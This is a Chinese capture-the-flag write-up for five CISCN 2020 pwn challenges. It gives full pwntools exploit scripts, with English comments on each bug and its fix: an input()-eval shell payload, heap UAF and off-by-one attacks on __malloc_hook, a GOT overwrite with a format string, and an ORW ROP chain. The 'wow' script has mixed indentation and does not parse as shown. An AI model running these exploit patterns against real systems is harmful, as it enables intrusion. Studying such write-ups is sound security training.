CISCN2020 PWNwp

国赛嘛,不想说啥

这里写目录

      • babyjsc
      • maj
      • easyboxs
      • nofree
      • wow
      • 总结

babyjsc

非预期,python的input命令执行漏洞

# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'  # pwntools: log every byte exchanged with the service
context.arch = 'amd64'  # pwntools defaults (word size / endianness) for its packing helpers

# Placeholder for the connection.  pwn() below assigns a *local* p (there is
# no `global p` in this script, unlike the others on the page), so this
# module-level value never changes; harmless, just inconsistent.
p = 0
def pwn(ip,port,debug):
	"""Connect to the babyjsc service and send the one-line payload.

	The writeup calls this the unintended solution: the service reads the
	client's line with ``input()``, which in Python 2 evaluates the text it
	reads (``eval(raw_input())``), so whatever the client sends runs as
	code on the server.  The fix on the service side is ``raw_input()`` (or
	``ast.literal_eval`` when a literal value is genuinely needed); network
	input must never be evaluated.

	Args:
		ip: remote host.
		port: remote port.
		debug: accepted for signature parity with the other scripts on
			this page but ignored here (always connects remotely).
	"""
	p = remote(ip,port)  # local name; the module-level p is left untouched
	payload='''__import__('os').system('sh')'''
	p.sendline(payload)
	p.interactive()  # hand the session over to the operator
if __name__ == '__main__':
	# Contest-time endpoint recorded in the writeup; the debug flag is ignored by this pwn().
	pwn('101.200.53.148',13465,0)

maj

UAF,没有打印函数,通过更改 IO_stdout 来泄露 libc 地址,然后改 malloc_hook 拿 shell;
脚本大约 1/16 的成功率。

# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'  # pwntools: log every byte exchanged with the service
context.arch = 'amd64'  # pwntools defaults (word size / endianness) for its packing helpers
elf = ELF('pwn')  # challenge binary; loaded but not referenced anywhere in this script
p = 0  # connection handle, rebound inside pwn() via `global p`
def pwn(ip,port,debug):
	"""Exploit flow for `maj` as described on the page: UAF -> stdout leak -> __malloc_hook.

	The service has no print function, so the writeup overwrites the stdout
	FILE struct to make the program itself leak a libc address, then steers
	an allocation next to __malloc_hook and writes a one-gadget there.  The
	page quotes a ~1/16 success rate; presumably that comes from the 2-byte
	partial overwrite on entry 1 below, which has to guess ASLR bits.

	Defensive reading: the UAF is visible in the script itself -- free(1) is
	followed by edit(1), i.e. freed entries stay writable.  Clearing the
	pointer table on free would remove the primitive.  Everything after the
	leak is pinned to one glibc build (0x3c5600, the ``one`` list, the
	FILE-struct layout), and __malloc_hook is resolved from the *local*
	libc.so.6, which is only valid if it matches the remote build.

	Python 2 only (``print`` statement).

	Args:
		ip: remote host (used when debug != 1).
		port: remote port.
		debug: 1 runs ./pwn locally under pwntools, anything else connects.
	"""
	global p
	if(debug == 1):
		p = process('./pwn')


	else:
		p = remote(ip,port)
	# Menu helpers.  Each exists twice: the *2 variants wait on the same
	# prompts without the trailing "\n".  NOTE(review): presumably needed
	# once stdout's flags have been clobbered and prompt framing changes --
	# confirm against a live run.
	def add(size,content):
		# option 1: allocate `size` bytes and fill them with `content`
		p.sendlineafter(">> ","1")
		p.sendlineafter("please answer the question\n\n","80")
		p.sendlineafter("______?\n",str(size))
		p.sendlineafter("start_the_game,yes_or_no?\n",content)
	def add2(size,content):
		# same as add(), prompts matched without the trailing newline
		p.sendlineafter(">> ","1")
		p.sendlineafter("please answer the question\n","80")
		p.sendlineafter("______?",str(size))
		p.sendlineafter("start_the_game,yes_or_no?",content)
	def free2(index):
		# option 2: free entry `index` (no-newline prompt variant)
		p.sendlineafter(">> ","2")
		p.sendlineafter("index ?",str(index))
	def free(index):
		# option 2: free entry `index`
		p.sendlineafter(">> ","2")
		p.sendlineafter("index ?\n",str(index))
	def edit(index,content):
		# option 4: overwrite entry `index`; content goes via send(), not sendline()
		p.sendlineafter(">> ","4")
		p.sendlineafter("index ?\n",str(index))
		p.sendafter("__new_content ?\n",content)
	def edit2(index,content):
		# same as edit(), no-newline prompt variant
		p.sendlineafter(">> ","4")
		p.sendlineafter("index ?",str(index))
		p.sendafter("__new_content ?",content)


	# Heap grooming: three chunks carrying fake size fields (0x71 / 0x51)
	# inside their own data, then two of them are freed.
	add(0x60,p64(0) + p64(0x71))
	add(0x60,p64(0) + p64(0x51))
	add(0x60,p64(0)*3 + p64(0x51))
	edit(0,p64(0) + p64(0x71))
	edit(1,p64(0) + p64(0x51))
	edit(2,p64(0)*3 + p64(0x51))
	free(0)
	free(1)


	# The UAF: entry 1 was just freed but can still be written (one byte here).
	edit(1,'\x10')
	add(0x60,'a')
	# delete(1)


	# Same pattern on the new chunk (index 4): its fake size is toggled
	# between 0x71 and 0x91 around repeated frees of entry 1.
	add(0x60,p64(0)*0xb + p64(0x71))
	edit(4,p64(0)*0xb + p64(0x71))
	free(1)


	edit(4,p64(0)*0xb + p64(0x91))
	free(1)


	# 2-byte partial overwrite of the freed entry (the ASLR guess) aimed at
	# the stdout FILE struct -- the page's "overwrite IO_stdout" step.
	edit(4,p64(0)*0xb + p64(0x71))#0x25dd
	edit(1,'\xdd\x25')
	add(0x60,'a')#5
	# 0xfbad1800 is the FILE-flags value the writeup uses for the stdout leak.
	add(0x60,'A'*0x33 + p64(0xfbad1800) + p64(0)*3 + '\x00')#6
	edit(6,'A'*0x33 + p64(0xfbad1800) + p64(0)*3 + '\x00')
	# one_gadget candidate offsets for the target glibc build; index 3 is used below.
	one = [0x45226,0x4527a,0xf0364,0xf1207]
	p.recv(0x40)
	# 0x3c5600: build-specific distance from the leaked pointer to libc base.
	libcbase_addr=u64(p.recv(6).ljust(8,"\x00"))-0x3c5600
	print "baseaddr=",hex(libcbase_addr)
	pause()  # manual checkpoint: lets the operator sanity-check the leak before continuing
	one_gagedt=libcbase_addr+one[3]
	# __malloc_hook is resolved from the *local* libc -- only correct if it matches the remote one.
	libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
	malloc_hook=libcbase_addr+libc.symbols["__malloc_hook"]
	fuck_chunk = malloc_hook - 0x23  # target just below __malloc_hook
	# UAF once more on entry 7, pointing it at the __malloc_hook area
	# (page: "change malloc_hook"), then the one-gadget is written there.
	add2(0x60,'a')#7
	free2(7)
	edit2(7,p64(fuck_chunk))
	add2(0x60,'a')#8
	add2(0x60,'b'*0x13 + p64(one_gagedt))#9
	edit2(9,'b'*0x13 + p64(one_gagedt))
	# One more allocation so malloc() runs and the hook fires.
	p.sendlineafter(">> ","1")
	p.sendlineafter("please answer the question\n","80")
	p.sendlineafter("______?","60")
	#gdb.attach(p)
	p.interactive()
if __name__ == '__main__':
	# Contest-time endpoint recorded in the writeup; debug=0 selects remote().
	pwn('101.200.53.148',15423,0)

easyboxs

off-by-one,同样没有打印函数。真有意思,感觉除了漏洞类型不一样,跟 maj 基本没啥区别。

# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'  # pwntools: log every byte exchanged with the service
context.arch = 'amd64'  # pwntools defaults (word size / endianness) for its packing helpers
elf = ELF('pwn')  # challenge binary; loaded but not referenced anywhere in this script
p = 0  # connection handle, rebound inside pwn() via `global p`
def pwn(ip,port,debug):
	"""Exploit flow for `easyboxs`: off-by-one -> stdout leak -> __malloc_hook.

	The writeup notes this is the maj exploit with a different bug: a
	one-byte heap overflow instead of a UAF.  The leak and hook stages are
	identical (stdout FILE flags 0xfbad1800, the one_gadget list, the local
	libc used to resolve __malloc_hook, the 0x3c5600 base offset) and carry
	the same caveat: they only work against that exact glibc build.

	Defensive reading: add() takes a `size` but the program evidently stores
	one byte more than that -- see the 0x18-byte allocations sent 0x19 bytes
	below -- so the next chunk's size field can be changed.  Checking the
	copy length against the allocation size closes the bug.

	Python 2 only (``print`` statement).

	Args:
		ip: remote host (used when debug != 1).
		port: remote port.
		debug: 1 runs ./pwn locally under pwntools, anything else connects.
	"""
	global p
	if(debug == 1):
		p = process('./pwn')


	else:
		p = remote(ip,port)
	# Menu helpers; the *2 variants match the prompts without the trailing
	# "\n".  NOTE(review): presumably needed after the stdout flags are
	# clobbered and output framing changes -- confirm.
	def add(index,size,content):
		# option 1: put `size` bytes of `content` into slot `index`
		p.sendlineafter(">>>\n",'1')
		p.sendlineafter("idx:\n",str(index))
		p.sendlineafter("len:\n",str(size))
		p.sendafter("content:\n",content)
	def add2(index,size,content):
		# same as add(), no-newline prompt variant
		p.sendlineafter(">>>",'1')
		p.sendlineafter("idx:",str(index))
		p.sendlineafter("len:",str(size))
		p.sendafter("content:",content)
	def free(index):
		# option 2: free slot `index`
		p.sendlineafter(">>>\n",'2')
		p.sendlineafter("idx:\n",str(index))
	def free2(index):
		# same as free(), no-newline prompt variant
		p.sendlineafter(">>>",'2')
		p.sendlineafter("idx:",str(index))
	# Initial layout: five chunks; slots 1 (0xf8) and 2/3 (0x68) are the
	# ones reshaped below.
	add(0,0x18,"A"*0x18)
	add(1,0xf8,"A")
	add(2,0x68,"B")
	add(3,0x68,"C")
	add(4,0x18,"D")
	free(0)
	# The off-by-one: 0x19 bytes into a 0x18 slot; "\xe1" lands in the
	# following chunk's size field.
	add(0,0x18,"A"*0x18+"\xe1")
	free(1)
	free(2)
	# Reshape the freed space.  '\xdd\x25' is a 2-byte partial overwrite
	# toward the stdout FILE struct (presumably ASLR-dependent, as in maj).
	add(0,0xd8,"A")
	add(5,0x18,"A")
	add(0,0x28,'\xdd\x25')
	free(5)
	add(5,0x18,"A"*0x18+"\x71")  # second off-by-one write (size byte 0x71)
	add(0,0x68,'a')
	# 0xfbad1800 is the FILE-flags value the writeup uses for the stdout leak.
	add(0,0x68,'A'*0x33 + p64(0xfbad1800) + p64(0)*3 + '\x00')
	# one_gadget candidate offsets for the target glibc build; index 3 is used below.
	one= [0x45226,0x4527a,0xf0364,0xf1207]
	p.recv(0x40)
	# 0x3c5600: build-specific distance from the leaked pointer to libc base.
	libcbase_addr=u64(p.recv(6).ljust(8,"\x00"))-0x3c5600
	print "baseaddr=",hex(libcbase_addr)
	pause()  # manual checkpoint before the hook stage
	one_gagedt=libcbase_addr+one[3]
	# __malloc_hook is resolved from the *local* libc -- only correct if it matches the remote one.
	libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
	malloc_hook=libcbase_addr+libc.symbols["__malloc_hook"]
	fuck_chunk = malloc_hook - 0x23  # target just below __malloc_hook
	# Free slot 3 and rewrite its area from slot 0 with a fake header followed
	# by fuck_chunk, so the later 0x68 allocations land there (page: "change
	# malloc_hook"); the one-gadget is then written in.
	free2(3)
	add2(0,0xa1,p64(0)*7+p64(0x71)+p64(fuck_chunk))
	add2(0,0x68,'a')
	add2(0,0x68,'b'*0x13 + p64(one_gagedt))
	# One more allocation so malloc() runs and the hook fires.
	p.sendlineafter(">>>",'1')
	p.sendlineafter("idx:",'1')
	p.sendlineafter("len:",'20')
	
	
	#gdb.attach(p)
	p.interactive()
if __name__ == '__main__':
	# Contest-time endpoint recorded in the writeup; debug=0 selects remote().
	pwn('101.200.53.148',34521,0)

nofree

这个是我们 whali3n51 师傅做的:top chunk 攻击,然后更改 GOT 表制造 printf 漏洞。

# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'  # pwntools: log every byte exchanged with the service
context.arch = 'amd64'  # pwntools defaults (word size / endianness) for its packing helpers
elf = ELF('pwn')  # challenge binary; loaded but not referenced anywhere in this script
p = 0  # connection handle, rebound inside pwn() via `global p`
def pwn(ip,port,debug):
	"""Exploit flow for `nofree` (credited to whali3n51 on the page): top-chunk attack -> GOT rewrite -> format string.

	The service offers no free, so the writeup corrupts chunk/top sizes to
	obtain allocations at chosen addresses, rewrites a GOT slot so that
	user data reaches printf as its format string (the "%17$p" leak), and
	finally writes system() into the same slot.

	Defensive reading: the absolute addresses (0x602140, 0x602068, 0x400700)
	mean the binary is not position-independent, and a writable GOT means
	RELRO is not full; PIE plus Full RELRO would break both halves of the
	chain.  How the 0xe1 size write reaches a chunk header is not visible
	from this script -- confirm against the binary.  The libc offset 0x20840
	is build-specific.

	Python 2 only (``print`` statement).

	Args:
		ip: remote host (used when debug != 1).
		port: remote port.
		debug: 1 runs ./pwn locally under pwntools, anything else connects.
	"""
	global p
	if(debug == 1):
		p = process('./pwn')


	else:
		p = remote(ip,port)
	def add(idx,size,content):
		# option 1: allocate `size` bytes into slot `idx` and fill with `content`
		p.sendlineafter("choice>> ","1")
		p.sendlineafter("idx: ",str(idx))
		p.sendlineafter("size: ",str(size))	
		p.sendafter("content: ",content)
	def edit(idx,content):
		# option 2: overwrite slot `idx`; content goes via send(), not sendline()
		p.sendlineafter("choice>> ","2")
		p.sendlineafter("idx: ",str(idx))
		p.sendafter("content: ",content)


	# Fill the heap with 0x18 throwaway allocations (there is no free to reuse).
	for i in range(0x18):
		add(0,0x90,'x'*0x90)

	# Size corruption (0xe1, then 0x81) so that later allocations overlap
	# and a slot pointer can be aimed at 0x602140 / 0x602068 -- presumably
	# a writable data area and a GOT slot; the page only says "GOT table".
	add(0,0x90,'\x00')
	edit(0,"x"*0x18+p64(0xe1))
	add(1,0x90,'x'*0x30)
	add(0,0x90,'x'*0x90)
	edit(1,"x"*0x38+p64(0x81)+p64(0x602140))
	add(0,0x90,'x'*0x77)
	add(2,0x90,'x'*0x77+'\x00'*17+p64(0x81))
	edit(2,"x"*0x70+p64(0x602068))
	# Slot 0 now points into the GOT; 0x400700 is presumably a printf PLT
	# stub, turning the next content write into a format-string call.
	edit(0,p64(0x400700))


	# Format-string leak: "%17$p" prints the 17th stack argument.
	add(0,0x10,"%17$p")
	p.recvuntil("0x")
	libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")  # local libc; must match the remote build
	libcbase_addr=int(p.recv(12),16)-0x20840  # 0x20840: build-specific offset of the leaked pointer
	edit(2,"x"*0x70+p64(0x602068))  # re-aim slot 0 at the same GOT slot
	system_addr=libcbase_addr+libc.symbols['system']
	print "system_addr=",hex(system_addr)
	edit(0,p64(system_addr))  # GOT slot -> system
	add(0,0x10,"sh")  # the hijacked call now runs with "sh" as its argument
	#gdb.attach(p)
	p.interactive()
if __name__ == '__main__':
	# Contest-time endpoint recorded in the writeup; debug=0 selects remote().
	pwn('101.200.53.148',12301,0)

wow

单字节溢出,通过修改部分指针从而控制返回地址,放入 ORW 的 ROP 链,读出 flag。

# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'  # pwntools: log every byte exchanged with the service
context.arch = 'amd64'  # pwntools defaults (word size / endianness) for its packing helpers
elf = ELF('wow')  # challenge binary; loaded but not referenced anywhere in this script
p = 0  # connection handle, rebound inside pwn() via `global p`
def pwn(ip,port,debug):
	"""Exploit flow for `wow`: single-byte overflow -> partial pointer overwrite -> ORW ROP.

	Per the writeup, one overflowed byte changes part of a pointer so the
	return address can be controlled; the stack is then pivoted onto an
	open/read/write chain that prints the file "flag".

	NOTE(review): the lines below mix a leading tab with four leading
	spaces (the addr_p/addr_d/read/loop1/loop2 assignments).  Python treats
	those as different indentation levels, so the listing does not parse as
	shown; the original presumably used tabs throughout.

	Defensive reading: every gadget address is absolute, so the binary is not
	position-independent (raw-syscall ORW suggests it is static and/or
	execve is filtered -- confirm).  PIE would invalidate the whole gadget
	list; a stack canary would likely not catch this, since the return
	address is reached through a modified pointer rather than a linear
	overflow, so the real fix is bounding the one-byte write.

	Python 2 only (``print`` statement).

	Args:
		ip: remote host (used when debug != 1).
		port: remote port.
		debug: 1 runs ./wow locally under pwntools, anything else connects.
	"""
	global p
	if(debug == 1):
		p = process('./wow')
	else:
		p = remote(ip,port)
	# Gadget addresses inside the challenge binary (absolute -> no PIE).
	poprax=0x41ea0a
	poprsi=0x407578
	poprdx=0x40437f
	poprdi=0x4047ba
	poprsp=0x405831
	syscall_ret=0x4dc054
	# Single-character opcodes of the service's mini language; meanings are
	# taken from the identifier names only.
    addr_p='@'
    addr_d='#'
	value_p='^'
	value_d='|'
	write='&'
    read='$'
    loop1='{'
    loop2='}'
	# Round 1: run a program, feed it one byte ("\xd0" -- the single-byte
	# write), then read 6 bytes back as a stack address.
	p.recvuntil("our code:\n")
	p.sendline(value_p+loop1+addr_p+value_p+loop2+read)
	p.recvuntil("running....")
	p.send("\xd0")
	p.recvuntil("code: ")
	stack_addr=u64(p.recv(6).ljust(8,"\x00"))
	print "stack_addr=",hex(stack_addr)
	p.sendafter("continue?\n",'y')
	# Round 2: same program, single byte "\xf8".
	p.sendlineafter('enter your code:\n',value_p+loop1+addr_p+value_p+loop2+read)
	p.recvuntil("running....")
	p.send("\xf8")
	p.sendafter("continue?\n",'y')
	# Round 3: the program with a stack pivot appended (pop rsp -> ret_addr,
	# an offset from the leaked stack address).
	ret_addr=stack_addr-0x598
	p.sendlineafter('enter your code:\n',value_p+loop1+read+addr_p+value_p+loop2+read+'c'+p64(0)+p64(poprsp)+p64(ret_addr))
	# ORW chain via raw syscalls (x86_64 numbers: open=2, read=0, write=1).
	# The filename "flag\0" sits at the end; stack_addr-0x4d0 presumably
	# points at it and stack_addr-0x49e is the read/write buffer.
	ROP=''
	ROP+=p64(poprdi)+p64(stack_addr-0x4d0)+p64(poprsi)+p64(72)+p64(poprax)+p64(2)+p64(syscall_ret)
	ROP+=p64(poprdi)+p64(3)+p64(poprsi)+p64(stack_addr-0x49e)+p64(poprdx)+p64(0x30)+p64(poprax)+p64(0)+p64(syscall_ret)
	ROP+=p64(poprdi)+p64(1)+p64(poprsi)+p64(stack_addr-0x49e)+p64(poprdx)+p64(0x30)+p64(poprax)+p64(1)+p64(syscall_ret)
	ROP+="flag\x00"
	pause()  # manual checkpoint before the chain is sent
	p.send(ROP)
	p.send('\xb0'*820)  # NOTE(review): purpose of this 820-byte fill is not visible here -- confirm
	p.sendafter("continue?\n",'n')  # stop the loop so the corrupted return is taken
	p.interactive()
if __name__ == '__main__':
	# Contest-time endpoint recorded in the writeup; debug=0 selects remote().
	pwn('101.200.53.148',15324,0)

总结

pwn 感觉有点套娃,尤其是 maj 与 easyboxs 差不多一样。个人觉得没啥新的知识点或者创意。
